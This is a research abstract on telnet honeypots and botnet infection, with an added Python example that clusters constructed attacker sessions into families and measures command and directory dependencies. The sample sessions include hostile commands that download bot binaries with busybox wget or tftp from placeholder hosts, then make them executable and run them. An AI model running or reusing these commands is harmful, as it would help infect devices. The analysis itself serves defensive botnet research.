ABSTRACT
Despite recommendations not to use telnet, the number of telnet-based botnets keeps growing, and these attacks need to be analysed. We deployed a network of high-interaction honeypots that emulate telnet devices. From the collected data we built a dataset, which we analysed from several perspectives. In this paper we focus on the infection phase of the botnets. Based on the signatures found in the collected samples, we divide the botnets into 9 families. We show dependencies between commands, and between commands and the directories used to propagate the botnets.
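The abstract describes the analysis pipeline only in outline: honeypot transcripts are reduced to the commands the attacker typed, sessions with similar command signatures are grouped into families, and command-to-command and command-to-directory dependencies are measured. The following is an added example of that pipeline, not the paper's own code or method: the four telnet session transcripts are constructed (hosts use RFC 5737 documentation addresses), the greedy Jaccard-threshold grouping and the 0.6 threshold are assumptions standing in for whatever signature matching the paper actually uses, and the normalisation rules (folding BusyBox applet calls into one name, folding `./payload` into `exec-payload`) are illustrative choices.

```python
"""Group telnet honeypot sessions into families by command signature and
measure command/command and command/directory dependencies.

Added example, not code from the paper.  The sessions are constructed, the
Jaccard-threshold grouping is an assumption, not the authors' method.
"""
import os
import re
from collections import Counter

# Constructed attacker-typed side of four telnet sessions (raw strings so the
# echo payload escapes survive).  192.0.2.0/24 is a documentation range.
SESSIONS = {
    "s1": r"""enable
system
shell
sh
cd /tmp || cd /var/run || cd /mnt || cd /
/bin/busybox wget http://192.0.2.10/bot.x86 -O bot
chmod +x bot
./bot""",
    "s2": r"""enable
sh
cd /tmp || cd /var/run
/bin/busybox wget http://192.0.2.11/bot.arm -O bot
chmod +x bot
./bot""",
    "s3": r"""sh
cd /dev/shm
/bin/busybox tftp -g -r bot.mips 192.0.2.12
chmod 777 bot.mips
./bot.mips
rm -rf bot.mips""",
    "s4": r"""enable
sh
cd /var/tmp
/bin/busybox echo -ne '\x7f\x45\x4c\x46' > bot
/bin/busybox chmod 777 bot
./bot""",
}

# Compound lines such as "cd /tmp || cd /var/run || cd /" are split into the
# individual commands the shell would try.
SEPARATORS = re.compile(r"\|\||&&|;")


def parse_session(text):
    """Return (commands, directories): normalised command names in order of
    first appearance, plus every directory passed to cd."""
    commands, dirs = [], []
    for line in text.splitlines():
        for part in SEPARATORS.split(line):
            tokens = part.split()
            if not tokens:
                continue
            name = os.path.basename(tokens[0])
            if tokens[0].startswith("./"):
                name = "exec-payload"          # running the dropped binary
            elif name == "busybox" and len(tokens) > 1:
                name = "busybox " + tokens[1]  # the applet is part of the signature
            if name == "cd" and len(tokens) > 1:
                dirs.append(tokens[1])
            if name not in commands:
                commands.append(name)
    return commands, dirs


def jaccard(a, b):
    a, b = set(a), set(b)
    return len(a & b) / len(a | b) if a | b else 0.0


def group_families(parsed, threshold=0.6):
    """Greedy single pass: a session joins the first family whose
    representative (its first member) is at least `threshold` similar,
    otherwise it founds a new family.  Threshold is an assumed value."""
    families = []  # list of (representative commands, [session ids])
    for sid, (commands, _) in parsed.items():
        for rep, members in families:
            if jaccard(rep, commands) >= threshold:
                members.append(sid)
                break
        else:
            families.append((commands, [sid]))
    return [members for _, members in families]


def command_dependencies(parsed):
    """P(b | a): fraction of sessions using command a that also use b."""
    seen, pair = Counter(), Counter()
    for commands, _ in parsed.values():
        cmds = set(commands)
        seen.update(cmds)
        for a in cmds:
            for b in cmds:
                if a != b:
                    pair[(a, b)] += 1
    return {(a, b): n / seen[a] for (a, b), n in pair.items()}


def command_directory_links(parsed):
    """Count, per (command, directory), sessions that run the command and
    cd into the directory; cd itself is excluded."""
    links = Counter()
    for commands, dirs in parsed.values():
        for d in set(dirs):
            for c in commands:
                if c != "cd":
                    links[(c, d)] += 1
    return links


def analyse(sessions=SESSIONS):
    parsed = {sid: parse_session(text) for sid, text in sessions.items()}
    return {
        "families": group_families(parsed),
        "dependencies": command_dependencies(parsed),
        "dir_links": command_directory_links(parsed),
    }


if __name__ == "__main__":
    result = analyse()
    for i, members in enumerate(result["families"], 1):
        print(f"family {i}: {members}")
    for (a, b), p in sorted(result["dependencies"].items()):
        if p == 1.0:
            print(f"{b!r} always follows {a!r}")
    for (c, d), n in result["dir_links"].most_common(5):
        print(f"{c!r} in sessions that cd {d}: {n}")
```

With the constructed input this yields three families (the two wget downloaders, the tftp downloader, the echo-based dropper), shows that `chmod` appears in every session that used `busybox wget`, and ties the wget download to `/tmp`. On real honeypot data the threshold would have to be tuned against a labelled sample, and sessions that only probe the shell (`enable`, `system`, `shell`, `sh`) without an infection stage should be filtered out first, otherwise they dominate the similarity scores.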
Index Terms
- Virtual honeypots and detection of telnet botnets